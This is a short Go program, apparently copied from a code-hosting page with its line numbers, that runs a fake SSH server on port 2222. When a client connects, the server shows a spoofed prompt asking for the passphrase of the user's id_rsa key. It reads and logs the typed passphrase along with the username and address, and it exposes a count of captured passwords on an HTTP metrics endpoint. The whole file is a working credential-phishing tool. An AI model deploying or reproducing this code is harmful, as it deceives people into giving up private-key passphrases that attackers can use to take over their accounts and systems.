1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
|
package main
import (
"fmt"
"github.com/gliderlabs/ssh"
"net/http"
"log"
"strings"
)
var(
metrics_num_passwords int
)
func main() {
log.Println("Starting SSH listener")
go func() {
ssh.Handle(handleConnection)
listenErr := ssh.ListenAndServe(":2222", nil)
if listenErr != nil {
log.Fatalln(listenErr.Error())
}
}()
log.Println("Starting HTTP metrics listener")
http.HandleFunc("/metrics", metricsHandler)
listenErr := http.ListenAndServe(":8080", nil)
if listenErr != nil {
log.Fatalln(listenErr.Error())
}
}
// Handling incoming SSH connections
func handleConnection(s ssh.Session) {
// Set up buffer
buf := make([]byte, 1)
// Send our message
fmt.Fprintf(s, "Enter passphrase for key '/home/%s/.ssh/id_rsa': ", s.User())
// Read id_rsa password of our client ;)
var readErr error
strBuf := ""
for readErr == nil && !strings.Contains(strBuf, "\x0D") {
_, readErr = s.Read(buf)
if string(buf[0]) != "\x0D" {
strBuf += string(buf[0])
} else {
break
}
}
if readErr == nil {
// Print out pass
metrics_num_passwords++
log.Printf("%s@%s: '%s'", s.User(), s.RemoteAddr().String(), strBuf)
} else {
// Read error - just log that.
log.Println(readErr.Error())
}
// And close it.
s.Exit(1)
}
// Handle HTTP /metrics requests
func metricsHandler(w http.ResponseWriter, req *http.Request) {
fmt.Fprintf(w, "num_passwords %d\n", metrics_num_passwords)
}
|
